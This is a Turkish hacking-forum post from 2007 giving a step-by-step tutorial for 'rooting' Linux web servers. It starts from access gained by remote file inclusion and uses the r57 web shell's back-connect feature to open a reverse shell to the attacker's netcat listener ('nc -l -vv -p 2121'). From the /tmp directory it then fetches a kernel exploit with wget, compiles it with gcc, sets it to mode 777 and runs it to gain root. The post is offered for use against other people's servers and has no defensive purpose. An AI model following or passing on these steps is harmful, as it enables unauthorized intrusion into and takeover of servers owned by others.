|
|
|||||||
| Web - Server Hacking & Security Web Hacking Hakkında Bilmek istediğiniz Herşey,koruma yolları ve güncel açıklar ile ilgili Bölümümüz |
 |
|
|
LinkBack | Seçenekler | Stil |
06-11-2007, 21:23
|
#1 (permalink) |
|
Teğmen
 
Üyelik tarihi: Feb 2007
Mesajlar: 65
|
Server Rooting [linux]
Server root diyince aklımıza ilk olarak ,local exploitler, netcat ve back connect gelir heralde.
Netcat bir telnet clientidir.Ilk olarak Unix türevli işletim sistemlerinde kullanılmaya başladı ve daha sonradan windows ortamına uygun hale getirildi. Genelde bu program bir sistemde backdoor açıldıktan sonra oraya bağlantı kurmak amaçlı kullanılır. netcati download bölümümüzden indirebilirsiniz. Eğer bir servera rfi ile erişimimiz varsa rootlamak için back connect yapmamız gerekir.Back connect yapmamız için yazma yetkisi olan bir yerde olmamız gerekir.Genellikle /tmp klasöründe permissionlar drwrwrwx olur .Yani full O zaman bizde hangi shelli kullanıyorsak o dizine geçeriz. Örnek: /home/vhosts/www.siteadı.org/httpdocs/ Shellin çalışma dizini buysa Biz Hepsini silip /tmp yazıp bu dizine geçeriz tmp dizinine geçeriz. Back connect için bize dc.pl ,bd.pl gibi araçlar gerekebilir.Ama ben r57 nin içinde olanı kullanıyorum.c99 dakini tavsiye etmem.r57 ,ile back connect için alt kısımlara bakıyoruz.orda back-connect yazıyor.Bir ip numarası ve port yazar. Örn: ip:111.111.111.111 port:2121 ip no bizim kendi ip imizdir.r57 ip nomuzu kendisi alır.Port ise netcat ile bağlanacağımız port numarasıdır.Hangi portdan bağlanacaksak o portun adsl modemimizde acık olması lazım [Eğer ethernetten bağlanıyorsak port açmak gerekir,usb den bağlanıyorsak gerek yok]. download bölümümüzden indirdiğiniz netcati c:\windows\system32 dizinine atıyoruz. başlat>çalıştır>cmd yazıp komut istemine geliyoruz [Aslında direk çalıştıra yazsak da olurdu ama netcatin copy/paste özelliği yok,cmd üzerinden yaparsak herhangi bir yazıyı kopyalıyıp yapıştırabiliriz.] ordan nc -l -vv -p portno yazıyoruz ve enter örnek: nc -l -vv -p 2121 enetera basıyoruz ve 2121. portumuz dinlenmeye başlıyor. Sonra r57 shellimizden ip nomuz ve portumuzu [2121] yazarak connect tuşuna basıyoruz ve pc mizden netcatden bağlantıya geçiyoruz. Ama henüz root olmadık . serverda tmp dizinindeyiz. bunu pwd yazarak da görebiliriz.Eğer tmp dizini cok karışık ise yeni bir klasör oluştururuz.Bunu aşağıdaki komut ile yapabiliriz. mkdir klasoradi Oluşturduğumuz bu klasöre exploit cekiceğimiz için permissionunu 777 yapmalıyız.Bunu da aşağıdaki komut ile yaparız. chmod 777 klasoradi sonra klasorumuze gitmek için cd klasoradi yazarız.Daha sonra serverin versionuna göre kullanacağımız exploiti cekeriz.Server versionunu uname -a komutu ile görebiliriz. daha sonra uygun exploitimizi wget [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] olarak cekeriz. *.c halinde ise derlememiz gerekir bunuda gcc -o exploit exploit.c ile derleriz.Daha sonra exploitimize 777 permission veririz. chmod 777 exploit ve çalışıtırırız. ./exploit Eğer exploitimiz kernel sürümüne uygunsa root olabiliriz. Unutulmaması gereken şey her zaman root olunmaz. Derlenmiş haldeki exploitleri [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] burdan bulabilirsiniz.Burdan cektiğiniz exploitleri derlemeden sadece chmod 777 exploit ./exploit Şeklinde çalıştırabilirsiniz. Written by Hackinger Bu döküman benim tarafımdan sıfırdan yazılmıştır.Alıntı yapıcaksanız altına ismimi eklemeden yapmayınız. Emeğe saygı lütfen.. Adsl modemlerde port açmayı da şurdan bakabilirsiniz. [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] netcat download [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
__________________
[T][S][H]
|
|
|
|
| Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| Seçenekler | |
| Stil | |
|
|
Normal
